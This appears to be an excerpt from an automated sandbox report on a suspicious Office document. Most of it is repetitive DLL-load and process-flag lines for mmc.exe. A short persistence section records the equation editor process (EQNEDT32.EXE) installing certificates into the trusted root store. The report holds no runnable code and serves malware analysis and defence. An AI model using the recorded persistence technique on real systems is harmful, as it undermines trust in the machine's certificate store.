Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\InProcServer32Jump to behavior
Source: C:\Windows\System32\taskmgr.exeWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\taskmgr.exeWindow detected: Number of UI elements: 25
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_009201F4 push eax; retf 2_2_009201F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0091C820 push eax; retf 2_2_0091C821

Persistence and Installation Behavior

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
